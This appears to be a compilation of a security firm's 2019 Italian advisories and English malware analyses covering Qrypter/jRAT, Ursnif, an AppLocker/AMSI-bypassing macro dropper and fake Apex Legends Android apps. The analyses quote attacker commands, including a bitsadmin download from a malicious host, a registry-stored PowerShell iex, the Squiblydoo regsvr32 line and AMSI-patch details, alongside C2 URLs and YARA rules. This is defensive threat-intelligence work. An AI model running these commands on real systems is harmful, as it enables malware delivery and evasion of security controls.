Grave Vulnerabilità in Magento

Proto: N080319.

Con la presente Yoroi desidera informarLa relativamente ad una grave vulnerabilità all’interno di Magento, noto framework per la realizzazione di portali e-commerce in PHP recentemente acquistato da Adobe, tra le dieci tecnologie open-source più popolari nel panorama cibernetico italiano. La criticità è nota con l’identificativo “PRODSECBUG-2198”.

La problematica è originata da lacune nella validazione degli input utente all’interno dei moduli di gestione del DataBase, attraverso le quali un attaccante remoto sprovvisto di autenticazione può iniettare codice SQL arbitrario all’interno del DBMS sottostante, ponendo a rischio di accesso abusivo l’intero database ed i sistemi ad esso connessi.

Il Produttore ha confermato la problematica rilasciando le versioni dell’e-commerce 2.3.1, 2.2.8, 2.1.17, 1.14.4.1 e 1.9.4.1 in grado di mitigare la vulnerabilità in oggetto.

Per via della potenziale esposizione internet degli applicativi affetti, della pubblicazione di dettagli tecnici e strumenti atti a replicare la problematica, Yoroi suggerisce di valutare lo stato di esposizione delle eventuali installazioni Magento all’interno delle Vostre infrastrutture e di pianificare l’installazione delle patch di sicurezza disponibili.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

Decrypting the Qrypter Payload

Introduction

During the last weeks, Yoroi’s monitoring operation intercepted some malicious emails required further attention: they were sent to a very few organizations and the contents was specifically tailored for Italian speaking targets. This messages warned the users about imminent summons against them, inviting them to read the attached lawsuit, a not so innocent looking file named “Avviso del tribunale.jar”.

This attachment has been dissected by Cybaze-Yoroi ZLAB team, revealing an interesting evolution of the Qrypter malware threat.

Technical Analysis

Sha2564ede0d4787f2e5bc471de3490e5c9327b459985530e42def9cf5d94ea4c2cb2b
ThreatQrypter-encrypted jRAT
Brief DescriptionJar file contains jRAT
Ssdeep12288:vimJ+fjGuiwDBA19F7/8fDFsJTVjODmYae:vimkiwDB6z8fZsN3Yae

The JAR file seems to be corrupted due to the absence of some classes. In fact, when it is started, the Java Virtual Machine launches a ClassNotFoundException related to a suspicious class named “qua.qrypter.Runner”.

Figure 1. Malware stacktrace

Qrypter is a Malware-as-a-Service, especially popular for its usage in combination with AdWind/jRAT malware, as described in older analysis too. However, this new sample seems to exhibit different protection techniques with respect to the previously documented ones.

Figure 2. JAR internal structure

Opening the JAR file through an archive manager it is possible to see its internal structure: most files are encrypted and only one of them, the “p14603/p14604/p14605.class”, represents an runnable Java Class.

Figure 3. Encrypted file content

So, the “p14605.class” file contains a Java Main which is responsible for decrypting and launching the actual payload. Reversing this class, the Qrypter capabilities emerge.

The decryption routine takes advantage of Java reflection to make the analysis harder: every single object used by the malware is loaded at runtime in a similar manner as shown in Figure 4, where the malware assigns the object System.out to a local variable called “f11131465014074101”.

Figure 4. Example of reflection usage

The "main" static method, initial entry point of the malware, is composed by few code lines setting up the right initial parameters for the actual decryption routine.

Figure 5. Malware’s main

Interestingly, the decryption routine implements a finite state machine (FSA) using the switch approach, a classical formal computational method commonly adopted by Information Engineers and Computer Scientists. The initial state is set to “24”.

Figure 6. Switch structure used as state-machine core

The switch instruction repeatedly checks the value of the “currentState” variable, indicating the last machine’ state, and then it jumps in the right case statement depending on its value. Each "case" contains a decryption routine step and an instruction used to move from the current to the next state. Figure 7 shows one of the instructions belonging to the decryption phase. Using different reflection layers, the malware tries to load the class “qua.qrypter.Runner”, whose name is contained into “f11131464987745335” variable; this is the point where the class launches the exception due to the missing class.

Figure 7. ClassLoader invocation through reflection

However, statically analyzing the decryption routine it was possible to reconstruct the malware behavior uncovering the details of the payload protection mechanism, enabling us to write a custom decipher to extract the next stage of the sample.

Inspecting the code we noticed the encryption key is stored in a particular variable among the huge number of reflective invocations:

Figure 8. Encryption key used to decrypt all the other files

With this information, we managed to decrypt all the protected files contained into the initial JAR archive mimicking the Qrypter behaviour. In detail, a “SecretKeySpec” has been created and then passed to a AES initialized “Cipher” object, but this first result is not plain-text yet, it actually is a GZIP compressed stream, so it has been forwarded into an additional “GZIPInputStream” object.

Figure 9. Encryption key used to decrypt all the other files

One of the decrypted files is a serialized “LinkedHashMap” object filled with a series of key-value entries representing the mapping between original file names and the fake/encrypted names. This object is fundamental to reconstruct the actual payload structure.

Figure 10. LinkedHashMap’s content indicating the relation between the ciphered files and their original name

In fact, inspecting the hashmap’s entries, many class names emerge. Their names confirm the presence of AdWind/jRAT as final payload: the “drop.box”, “sky.drive” and “mega.download” files are well-known artifacts (Figure 10), containing malware private keys and configurations. Decrypting them, it was possible to recognize the AdWind/jRAT configuration schema, similar to the one previously analyzed in our report (The Story of Manuel’s Java RAT).

Figure 11. Classic jRAT configuration file

Conclusion

Even if the final payload is a well-known malware, like jRAT, the Qrypter crypter made it invisible for several antivirus engines. Moreover, this version of Qrypter seems to be different than the older ones: the intensive use of reflection techniques and the state-machine approach have never been mentioned in the previous analysis. Qrypter was popular for its MaaS model, but at this moment the web service is unreachable, so it is not clear how the malicious author used Qrypter to weaponize its AdWind/jRAT payload.   

Indicators of compromise

Hashes

Yara Rules

rule Qrypter_JRat_201903{

	meta:
  	description = "Yara Rule for Qrypter encrypted JRat"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2019_03_26"
  	tlp = "white"
  	category = "informational"

	strings:
   	$a = {50 4B 03 04}
	$b = "META-INF/MANIFEST.MF"
	$c = /p[0-9]+\/p[0-9]+\/p[0-9]+.class/
	$d = {6E 31 ?? ?? ?? ?? ?? ?? ?? ?? ?? 50 4B}
	
	condition:
    	all of them
}

This blog post was authored by Antonio Farina and Luca Mella of Cybaze-Yoroi Z-LAB

The Ursnif Gangs keep Threatening Italy

Introduction

The Ursnif trojan confirms itself as one of the most active malware threats in cyberspace, even during the past days, when new attack attempts reached several organization across Italy. Cybaze-Yoroi ZLab teams dissected its infection chain to keep tracking the evolution of this persistent malware threat, analyzing its multiple stages, each one with the purpose to evade detection, sometimes leveraging system tools to achieve its final objective: run the Ursnif payload.

Figure 1: Infection chain of Ursnif malware

Technical Analysis

Unlike previous waves, this one does not leverage steganography or heavily obfuscated powershell payloads. Instead, it abuses a VB script hidden into a compressed archive embedded within an innocent looking email referencing a summon. When users click on “Decreto” hyperlink, they are redirected to a Google Drive web page which opens a fake page where a fake document is shown and it invites them to click on a download link

Figure 2: Drive document “Scarica il documento”

Once clicked on the “Scarica il documento” link into the Drive document, an archive is downloaded on the victim machine from blogger[.]scentasticyoga[.]com, embedding two different files: the first is an obfuscated Visual Basic Script (VBS) and the second one is a legit image placed there to deceive the victim.

Figure 3: File contained in the Zip file

The VBS code is obfuscated to evade antivirus detection and, in order to confuse the analyst, all the values are manipulated in different steps: using many mathematical operations, very long random variable names and other content encoded in Base64 format. The malicious routine is split in many slices and then recombined at runtime, quite basic but it is effective evasion technique. After a first de-obfuscation phase, a more readable code could be obtained.

Figure 4: Malicious VBS, obfuscated (left) and de-obfuscated (right)

In the end, the infection starts and the malware runs cmd.exe to download the “eyTWUDW.exe” through the Bitsadmin utility, and store it into "%APPDATA%\Local\Temp".

“C:\Windows\System32\cmd.exe” /c bitsadmin  /transfer msd5 /priority foreground http://blog.practicereiki.com/pagpoftrh54.php C:\Users\admin\AppData\Local\Temp/eyTWUDW.exe

The Bitsadmin utility is legit Microsoft command line tool typically used by sysadmins to download system updates, but during the last years it has also been abused by cyber criminals to masquerade malicious network activities. In this case it has been leveraged to manage the download of the next component of the infection chain from “hxxp://blog[.practicereiki[.com/pagpoftrh54[.php”.

After that, the loader runs “schtasks” to enable the execution of the “eyTWUDW.exe” payload temporary stored in “%APPDATA%\Local\Temp”, and then downloads the next malware stage from

http[://link[.kunstsignal[.net/images/W534K5hp8zGWYvpMJkayjGf/FqWxvwp_2F/1_2BEPHtH1r_2FpG5 /o0BuA8sr5LGg /IDwj8Q6mCoq/5nK9XEb3WoD5wW/y8lJVn5t5QXZMUgDQopzF /oO58ImaZl53M5X3E/whzGq3GIOtuCnK6/o3R_2BwMMv/wAo5qeqZ/a[.avi

Through the mentioned URL, it was possible to intercept the downloaded encrypted payload, sub-sequentially digested by the “eyTWUDW.exe“ process which, after an internal decryption phase, stores it into a registry key, establishing a file-less persistence on the target machine.

Figure 5: Registry key set by malware

Moreover, the malware contacts another time the C2 to confirm the successful infection, sending a check-in HTTP request containing parameters used to identify the malware implant:

ParameterValueDescription
soft3Major release
version214071Malware software version
userb2861874feedbf530d08c77a9d5833deUser id of the infected machine
server12Server ID
id822Synthetic id of infected machine
crc1checksum
uptime235Time of infection start

Table 1: Ursnif infection format

Investigating the remote destination where the C2 is hosted, it results active since 05 March 2019, just a few times before the attack wave; destination unknown to many AV Vendors at time of attack, suggesting this portion of the infrastructure has been specifically prepared for the Italian landscape.

At this point, “eyTWUDW.exe” runs the previously stored script through the following command, invoking Powershell code from the registry sub-key “amxrters”.

powershell  iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\Software\AppDataLow\Software\Microsoft\94502524-E302-E68A-0D08-C77A91BCEB4E').amxrters))

The content of this additional script is obfuscated with layers of Base-64 encoding, arrays of integers and char-code to byte conversions. Dissecting the script we obtained a more readable code:

Figure 6: Script extracted from registry key (left Obfuscated, right Deobfuscated)

The first part contains dependencies loaded by the malware to interact with the OS, such as the classic “kernel32” and, more interestingly, one of the last called functions reveal the usage of the same APC injection techniques observed in previous attack waves to inject the payload into the “Explorer.exe“ process (rif. “QueueUserAPC” in “Dissecting the Latest Ursnif DHL themed Campaign”). The de-obfuscation of the central part of the script reveals the classical string “This program cannot be run in DOS mode”, part of the header of the final stage of the malware will be injected into the Explorer process.

Figure 7: Ursnif final payload extracted from script

After noticing the payload is very similar to another Ursnif sample yet analyzed in “Ursnif Long Live the Steganography”, we proceeded with a differential analysis to spot eventual variations between the samples.

Figure 8: Diff. analysis between already analyzed sample (1)

At first look, there are many common parts between the samples, for instance both files are compiled in 64 bit mode and the value in the PE sections are closely similar. However, the compilation time were different: while the older is the 28th January, the newer one is 11 March, almost a week after the comparison on the internet of the command and control server host 46.8.18[.186 (CONTEL-NET-3 RU).

Figure 9: Diff. analysis between already analyzed sample (2)

Conclusion

Ursnif confirms itself as one of the most active and aggressive malware threats spreading both worldwide and within the Italian cyber-landscape. Threat actors behind these attacks constantly update and vary their infection chains to avoid security controls and evade antivirus detection, luring users with context sounding email messages being opened by thousands of victims each attack wave. A serious threat for the security of users data and company assets.

Indicator of Compromise

Yara Rules

rule Ursnif_201903 {
meta:
	description = "Yara rule for Ursnif loader - March 2019 version"
	author = "Yoroi - ZLab"
	last_updated = "2019-03-22"
	tlp = "white"
	category = "informational"
strings:
	$a1 = { 83 02 00 30 83 02 00 4C 83 02 00 68 }
	$a2 = { FF 83 C4 18 EB 19 FF 75 1C 8D }
	$a3 = { 32 A8 D7 0E D9 85 B5 E7 67 F3 0F 53 }

condition:
	all of them
 }

rule Ursnif_201903_regkey_payload {
meta:
	description = "Yara rule for Ursnif registry key payload - March 2019 version"
	author = "Yoroi - ZLab"
	last_updated = "2019-03-22"
	tlp = "white"
	category = "informational"
strings:
	$a1 = "53,45,9f,22,96,b4,20,01,7f,45"
	$a2 = "17,a9,ef,0e,48,a5,1c,24,a2,47,16,76"

condition:
	all of them
 }

This blog post was authored by Luigi Martire, Davide Testa and Luca Mella of Cybaze-Yoroi Z-LAB

Campagna di Attacco Ransomware

Proto: N070319.

Con la presente Yoroi desidera informarLa relativamente ad una pericolosa campagna di attacco rivolta ad aziende italiane. Le email intercettate sono appositamente curate per ingannare i malcapitati destinatari simulando l’invio di candidature spontanee per posizioni vacanti. Il documento Office in allegato contiene però codice macro in grado di infettare la macchina bersaglio con varianti GandGrab, pericoloso Ransomware in grado di rendere inutilizzabili gran parte dei dati raggiungibili dall’host vittima.

Figura. Apertura del documento Malevolo

Di seguito si riportano gli indicatori di compromissione individuati durante le analisi condotte:

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

Importante Vulnerabilità in “Ruby on Rails”

Proto: N060319.

Con la presente Yoroi desidera informarLa relativamente ad una importante vulnerabilità recentemente scoperta all’interno di Ruby on Rails, diffuso framework per la realizzazione di applicazioni web moderne basate sul paradigma MVC, utilizzato da oltre un milione di siti web in tutto il mondo e più di tre mila in Italia. La criticità è nota con l’identificativo CVE-2019-5418.

La problematica è originata da lacune nella validazione di alcuni header di richieste HTTP all’interno del componente “Action View”, attraverso il quale un attaccante di rete non autenticato può essere in grado di accedere e scaricare a file arbitrari all’interno del server bersaglio.

Il Produttore ha confermato la criticità, la quale affligge tutte le versioni di Ruby on Rails, ed ha rilasciato le versioni 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2 e 4.2.11.1 in grado di risolvere la problematica. Gli aggiornamenti indicati sono inoltre in corso di recepimento anche da Vendor e Manutentori di sistemi operativi Linux-based, e.g. Red-Hat, Debian, SuSE, Canonical.

Per via della disponibilità di dettagli tecnici e della potenziale esposizione internet di servizi affetti, Yoroi suggerisce di controllare lo stato di aggiornamento per le eventuali installazioni Ruby on Rails presenti all’interno delle Vostre infrastrutture, di valutarne lo stato di esposizione e di pianificare l'applicazione delle patch disponibili.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

The Document that Eluded AppLocker and AMSI

Introduction

Few days ago, during intel sources monitoring operation, the Cybaze-Yoroi ZLAB team encountered an interesting Office document containing some peculiarities required a deeper analysis: its payload includes techniques suitable to bypass modern Microsoft security mechanisms such as AppLocker, the application whitelisting security feature in place in well-configured Windows OSes, and the newer Anti-Malware Scan Interface (AMSI), a vendor agnostic security interface enabling anti-virus controls on running scripts, macro code and even memory blocks, designed to tackle obfuscation and file-less threats.

For this reason, the sample has been further dissected and analyzed by Cybaze-Yoroi ZLAB.

Technical analysis

Sha256127e9f68f0f97d6dafe55ad651f5b3c0f6a7b504b9b4b4d9aecc1f2141347447
ThreatGen.Dropper
Brief descriptionDoc Document dropper
Ssdeep1536:T1J7YxuapCK+9U87lMhldXxPtXjUkcAS8UNm:hJsxuaoL9U86xhVXQkcAS8

Table 1. Sample information

The initial document invites the user to enable MACRO execution to display the real content, silently starting the infection chain in background while other decoy components are shown to the victim.

Figure 1. Initial document view
Figure 2. Fake pop-up error

After a few seconds, a pop-up window is shown, reporting an error related to the decryption of the document, and then the Word document is automatically closed.

At this time, the unaware victim may think there is a problem with the document and nothing malicious happened, but actually the malware already proceeded with its operation in stealthy way. Analyzing the document view with more attention it possible to notice a suspicious chunk of strings in the smallest box in the left of the document:

Figure 3. Zoom on suspicious Word label

The box named “Kplkaaaaaaaz”contains a base64 encoded payload, subsequently extracted by macro execution and assigned to the “dopzekaoooooooo” variable. It will be used to fill the next-stage bat file. This technique, include part of the payload into a Word Label object or cells, allows to hide and embed more code directly into the attack vector, lowering the chances of detection.

Also, the malware adopts an evasion technique to determine if it is execute in a sandboxed environment. In fact, it checks if the machine’s domain name is equal to the computer name and if this condition holds the previous “Kplkaaaaaaaz” variable is set to “This document contains VBA.”, causing the infection chain to stop. This trick is able to bypass all the major sandboxing services, like Any.run and Hybrid Analysis.  

Figure 4. Obfuscated macro code

After a deobfuscation phase, the malware behavior emerges. The next actions to performed are contained into “%temp%\errors.bat” script, which is executed by a copy of “cmd.exe” stored into %appdata% folder, named “msutil.exe”.

Figure 5. Deobfuscated macro function

The screen above shows the instruction used to pop up the fake error window (Figure 2), which is a simple Visual Basic MsgBox. Unlike most malwares, this one uses a different technique to automatically start the macro code at the document opening time. Instead of using the Workbook_Open or Auto_Open functions, it exploits the Word InkEdit object to use the InkEdit1_GotFocus function, which will be launched as soon as the InkEdit1 is displayed.

Figure 6. Function to start macro at open

The “errors.bat” file contains a Base64 encoded powershell script which will close the initial Word document by killing its process and definitively delete it from the file system. The script shows another evasion technique by checking the memory amount available on the system: if it is less than 1 GB the malware terminates its execution and removes all the infection evidences.

Figure 7. Powershell code embedded into “errors.bat” file

The check against available memory is done through a CIM (Common Information Model) server instance. Strangely, the return value of this cmdlet is assigned to a variable named “diskSizeGB” even if the function returns the amount of the available RAM (a probable error made by the author) and not the disk’s one.

After the evaluation of the previous conditions, the BAT file proceeds to set a new Registry Key, named as the victim’s username, storing a random value in it.

Figure 8. RegKey set by malware

The random value is necessary to create a new TXT file which will be filled with a base64 payload. Then, the file content is then decoded using the “certutil” Windows utility and finally executed using the instruction:

start /b regsvr32 /u /n /s /i:%appdata%\9711.txt scrobj.dll

This trick is known as “Squiblydoo”. It allows to bypass Windows AppLocker, the application whitelisting technology introduced with Microsoft's Windows 7 operating system. AppLocker restricts which programs users can execute via Group Policy. i.e. the enterprise administrator can disable the script execution on every machine belonging to the enterprise domain. So, using this AppLocker Bypass trick it is possible to launch any script, eluding the block.

Fundamental part of the trick bypass is the “scrobj.dll”, belonging to Windows Utility DLLs. It is able to create Component Object Model (COM) components using scripting languages such as Visual Basic Scripting Edition (VBScript) and JScript. So, as expected, “9711.txt” is a scripting file producing a new COM object, which will be registered using the “regsvr32” utility.

Figure 9. Scripting file used in Squiblydoo trick

Obviously, also this code is heavy obfuscated, but using a JScript interpreter it is possible to extract some interesting evidences.

Figure 10. ActiveXObject executed through Squiblydoo

The just created ActiveXObject uses the previously stored random value to set malware persistence into HKCU\\Environment\\UserInitMprLogonScript in order to start its malicious actions at logon time.

Figure 11. Malware persistence

After that, it starts a new obfuscated Powershell script which looks like that:

Figure 12. Final payload including an Empire stager

The malware shows also in this stage an evasion technique to avoid sandboxing analysis waiting for a long time period, over 5 minutes. So, it checks the OS version and retrieves code from “hxxp://riscomponents[.]pw/test[.]txt”: these Powershell instructions are used to bypass the Antimalware Scan Interface (AMSI).

AMSI is a versatile interface standard that allows applications and services to integrate with any anti-malware product that is present on a machine. It is mainly designed to help two kind of stakeholders: application developers who want to make requests to anti-malware products from their apps and anti-virus vendors who want their products to offer their features directly to applications. Moreover, AMSI is  integrated by default into some Win10 components, such as User Account Control (UAC), PowerShell, Windows Script Host, JavaScript, VBScript and Office VBA and it allows to evaluate code just prior to its execution, after all the obfuscation has been stripped away.

However, several AMSI bypass methods exist in Internet, many of them require only a few code lines, like the one found during the analysis:

Figure 13. AMSI bypass code used by the malware

This code retrieves the memory address of the AmsiScanBuffer function belonging to “amsi.dll” system library, then rewrites some of its bytes with the buffer {0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3}, permanently disabling the AMSI scan capability. The attacker probably re-used one of the scripts publicly available in Internet, like this , written in C#. As shown in figure, the snippet seems to be almost the same used by the malware:

Figure 14. AMSI bypass snippet available on Github

The rest of code’s goal is to retrieve new commands to execute from its Command&Controls located at hxxps://185.198.57[.]142/admin/login.php. Analyzing the piece of script involved to download new instructions, it seems to be an Empire powershell stager, as shown in some examples reported by SANS in their paper. Unfortunately, the server is down at the analysis time, so it is impossible to carry on the investigation.

Due the malware complexity, a brief scheme of its behavior is shown in the following figure.

Figure 15. Malware infection scheme

Conclusion

Using a combination of multiple evasion techniques, some of them even trivial such as the exploiting of the lazy naming scheme adopted by popular sandboxes, the analyzed threat was able to evade advanced security mechanism in place in modern Windows systems like AppLocker and AMSI: controls designed to support the implementation of high level security requirements, such as application white-listing policies and the mitigation of file-less threats. Showing how a sufficiently motivated attacker could be able to set up a hardly detectable payload able to overcome even these strict security mechanism, providing another evidence of the gap between technology and human attackers.

Indicator of Compromise

Yara Rules

rule doc_macro_14_03_2019{

	meta:
  	description = "Yara Rule for doc_macro sample"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2019_03_14"
  	tlp = "white"
  	category = "informational"

	strings:
    		$a = {3C F1 6E 56 75 4A 2C 87 98}
   		$b = {10 5A AC FA 32 0E 0E 03 81 6A 23 10}
    		$c = "MDFLYUhadFpFaFFh"
    		$d = "InkEdit"
    		$e = "373035373536363"

	condition:
    		all of them
}

rule App_Locker_Bypass_14_03_2019{

	meta:
  	description = "Yara Rule for App_Locker_Bypass sample"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2019_03_14"
  	tlp = "white"
  	category = "informational"

	strings:
    		$a = "'ht'+'tp:/'+'/riscomp'+'"
    		$b = "'185.'+'198.'+'57.142:443'"
    		$c = "BXOR"
    		$d = "session='+'55pN'+'RTeT'"

	condition:
    		all of them
}

This blog post was authored by Antonio Farina, Davide Testa and Luca Mella of Cybaze-Yoroi Z-LAB

Campagna di Attacco Ursnif in Corso

Proto: N050319.

Con la presente Yoroi desidera informarLa relativamente ad una emergente ondata di attacchi rivolta ai danni di organizzazioni ed utenze italiane. I messaggi di posta intercettati contengono documenti Excel malevoli in grado di evadere sistemi perimetrali ed analisi comportamentali, effettuano infatti controlli su configurazioni locali presenti sulla macchina bersaglio prima dell’avvio della catena di infezione.

Figura. Esempio Documento Excel Malevolo

Successivamente i documenti infetti caricano codice powershell malevolo tramite tecniche di steganografia, analogamente a quanto osservato in EW N070119, ed in seguito installano sul sistema vittima un impianto malware della famiglia Ursnif.

Di seguito si riportano gli indicatori di compromissione individuati a fronte delle analisi condotte:

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

Torrent Risks: an Analysis

Digital media sharing is one of the most relevant phenomena since the advent of the internet. During the 80’s and 90’s, with the rapid growth the Internet, people around the world started sharing digital stuff protected by copyright, through particular communication protocols and programs such as FTP, IRC, etc.

At the time, only a few people had the capability to access to these illegal networks. Today the situation is quite different, it is very easy to share any kind of content through simplified file-sharing services making it easy to obtain copyrighted material and pirated copies of popular software.

Cybaze-Yoroi Z-Lab researchers conducted a study on the risks related to the use of the BitTorrent protocol to download movies, games or pirated software. The analysis shed the light on the risk faced by users while searching for movies, games, and software on popular BitTorrent trackers. The experts analyzed dozens of torrents and discovered that most of them are delivered in bundle with malware or Adware, exposing at risk of infection the average user with a few interactions.

In this analysis, researcher downloaded torrents belonging to 3 different categories of interest: Movies, Games and Software. They searched for 2 highly anticipated films : “The Avengers 4” and “Joker” for the “Movies” category, for the “Games” category they search for “Fortnite”, one of the most played videogame and, for the “Software” category they searched for some of the most requested software of this moment, “Nero Burning Rom”, “Adobe Photoshop Lightroom” and “Malwarebytes Premium”.

Experts discovered that most of the torrents contains well-known malware that are currently detected by most anti-viruses and, also, most of the malicious torrents have a good reputation in terms of seeders. In the BitTorrent terminology, seeders are ...

Download the full White Paper

Vulnerabilità 0-Day in Sistemi Windows

Proto: N040319.

Con la presente Yoroi desidera informarLa relativamente alla recente scoperta di una importantevulnerabilità all’interno dei moderni sistemi operativi Microsoft Windows. La criticità è nota con l’identificativo CVE-2019-0797.

La problematica è originata da corse critiche mal gestite all'interno del modulo di sistema “win32k.sys”, che un attaccante, con accesso locale alla macchina, può sfruttare al fine di ottenere privilegi amministrativi su di essa, prendendone in completo controllo ed evadendo restrizioni e policy di sicurezza.

Ricercatori di terze parti hanno rilevato lo sfruttamento di questa vulnerabilità in recenti attacchi ai danni di sistemi operativi Windows 10, operati da parte di attori malevoli attivi nell’area Mediorientale e Asiatica. Il Produttore ha confermato la problematica attraverso un apposito bollettino di sicurezza, ove risultano afflitte le versioni 32 e 64 bit di Microsoft Windows Server 2012, 2012 R2, 2016, 2019, Microsoft Windows 8.1 e 10, anche per architetture ARM64.

Per via dei correnti abusi registrati in-the-wild e del rischio di ulteriori sfruttamenti anche in scenari di attacco basati su malware, Yoroi suggerisce di pianificare l’applicazione del pacchetto di sicurezza “March 2019 Security Updates” all’interno del Vostro parco macchine Microsoft Windows.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

Apex Legends for Android: a Fake App could Compromise your Smartphone

Introduction

At the beginning of 2019, Electronic Arts released a game for PC, XBox One and Playstation 4 named Apex Legends. It is a battle royal game like Titanfall and Fortnite, the latter is the direct competitor in the battle royale gaming panorama.

The game has achieved great success in the gamers community with 25 million of players since its launch and in a few days it exceeded his closest competitor in terms of online gamers. The popularity of this game and its absence on the Android Play store, have attracted the attention of many malware writers who had exploited these opportunities to spread their malicious version for Android. Similar cases has been registered with Fortnite game.

In the following report, the Yoroi ZLab - Cybaze researchers analyzed this latest emerging threat.

Technical analysis

Yoroi-Cybaze ZLab researchers found four different fake android APKs related to Apex Legends game. All of them have been downloaded from untrusted sources available on the clearnet. Malware authors created well-designed fake web pages, replicating all the graphics of the game misleading the user to download the app, as shown in the following image:

Figure 1:fake/phishing Apex Legends web page

An example is “hxxps://apexhack[.]site/”, from which the researchers downloaded one of the samples. As shown in the above figure, the malicious website hosts both the Android and IOS version of the fake app, but only the Android one has been taken into account for this analysis. In the following tables, the information about the retrieved samples is shown.

Sha 25638dc9d141c3eb9ce7a6ccf4851d18f73a539de9c7940c7b22f51dab15557a189
ThreatApex Legends for Android
Brief descriptionFake Apex Legends application not available on Android’s play store (4.61 MB)
Ssdeep98304:q6iX/A6ojBzHgIa7ntMVgGNt4/WViBQtRQjr4jrTjrxjrUjrd:PiPArlaRMnNt4/WViBIQj0jfjFjwjp

Table 1: information about first fake android app

Sha 256198477234b7f7d5d694c1b00dd77bc260e850750c94f9afb2409afa93665c890
ThreatApex Legends for Android
Brief descriptionFake Apex Legends application not available on Android’s play store (36.38 MB)
Ssdeep786432:WwO6h1yOFPijc2rPvre5BirSnC4Uu8Wt8tHH/rJ0IuMxLvjb:Z/kzrewI8tHfN00rb

Table 2: information about fourth fake android app

Sha 256d0a0fec1a81735df80b3ffb7ef61ce2d6c9fbea8877a86da10557a41fbfa817b
ThreatApex Legends for Android
Brief descriptionFake Apex Legends application not available on Android’s play store (17.71 MB)
Ssdeep393216:DYPdYhEvt/d+iJap4TIT4z2Y/ObXRWNiBGMnCP1Z74HGpPA9qxkyqGds:sPdYhEvt/d+PH4qPTwNTR49q+Kds

Table 3: information about second fake android app

Sha 256c63c1f01485427eb62e8a3baf3fd016eccf9ca245551b234c60b1c64d8c3c782
ThreatApex Legends for Android
Brief descriptionFake Apex Legends application not available on Android’s play store (808.11 KB)
Ssdeep12288:DTG9sGlIrK7ZqC9HDrSYoNQfuhhLaD26C9XgqRCIlNE8Z6GvhZt:DMsoIrKIC9HSYo6Wh5aDnG5ZJ

Table 4: information about third fake android app

Despite the usage of Apex Legends references, the first two applications do not contain a real malware, but their main purpose is to obtain an economic return through Google Mobile Ads SDK. Indeed, exploring the apk’s internals, it is possible to notice the packages related to Google Ads.

Figure 2: Google Ads structure in one of two sample after reverse

These apps are not very interesting, so they will not analyzed in-depth. More attention is required for the third and fourth sample (Table 3 and Table 4).

Sample 3

The third sample is an attempt to hijack the user towards a phishing site. When the app is running, it shows an Apex Legends video and, then, the application prompts the user to press the “OK” button in order to verify the EA Mobile Account.

Figure 3: popup required by app to verify EA mobile account

Reversing the apk, only one useful class emerges which clearly shows the link pointing to the phishing service.

Figure 4: URL where is hosted a phishing web page.

After the user taps on the button, the fake app opens a phishing web page inviting him to subscribe to some services, specifying his personal details and the credit card number.

Figure 5: phishing web page provided by URL cited above.

Behind the URL “www.areyouabot[.]net” there is a well-known malicious site, active since 2016, and related to a huge phishing network, in which also some URLs related to fake MS Office pages are present.

Figure 6. Another URL related to http://www.areyouabot[.]net site.

Despite the phishing website is well-known, at the time of writing, the application has a medium detection rate, as shown in the following figure:

Figure 7. Third sample’s detection rate

Sample 4

This app has the smallest size because it does not provide any videos or media resources. Despite its dimensions, this is the only apk that shows a spyware behavior. So, many anti-malwares detects it.

Figure 8: AV detection rate for the sample reported in table 4

Further confirmation of the malicious behavior is provided by the long list of required permissions, necessary to perform its operations. In the following figure is shown a complete list of permissions required by the application.

Figure 9. Complete list of required permissions

After a reversing phase, it is possible to analyze the malware source code in-depth.

Figure 10: structure of malware

It is easy to reconstruct the malware’s behavior because the author did not use advanced anti-analysis techniques. Only the class names are re-written using a single letter names in order to make the code analysis hard, probably a packer was used. Digging in the apk’s manifest, it is possible to notice that the main class is located in “yps.eton.application.M”.

Figure 11: Main activity visible in Android Manifest provided by application

When started, the malware uses a simple trick to stay hidden to the user, in fact, it removes its icon from the Home Menu, then it registers a new service to intercept the events happening into the device. The service registration is visible in the following image:

Figure 12: creation of service

The icon removal is done, as usual, using the “setComponentEnabledSetting” method, specifying some values as parameters:

k = 2 = COMPONENT_ENABLED_STATE_DISABLED<br>
m = 1 = DONT_KILL_APP
Figure 13: removal of icon application

So, when the user taps on the back button, the icon is hidden and the real behaviour of malware will be performed through the service. The service core is represented by the “A” component which includes some different inner class inside of it.

Figure 14. Part of “A” class used to retrieve info about the infected device

Most operations are performed by “A” class, but there are other classes involved in specific tasks, i.e. the “C” class is used to trace the inbound and outbound phone calls.

Figure 15. Part of “C” class.

Due to the absence of the icon, the user does not care about the presence of the malicious service, which continues to perform its actions in background. Otherwise, inspecting the installed services through the Settings Menu, it is easy to detect the malicious one.


Figure 16. Settings view reporting the fake Apex service.

After collecting all the information about its victim, the spyware sends them to its C2 located at “krater[.]giize[.]com”. Unfortunately, at the time of analysis the server seems to be down.


Figure 17. Attempts of C2 communication

Attribution

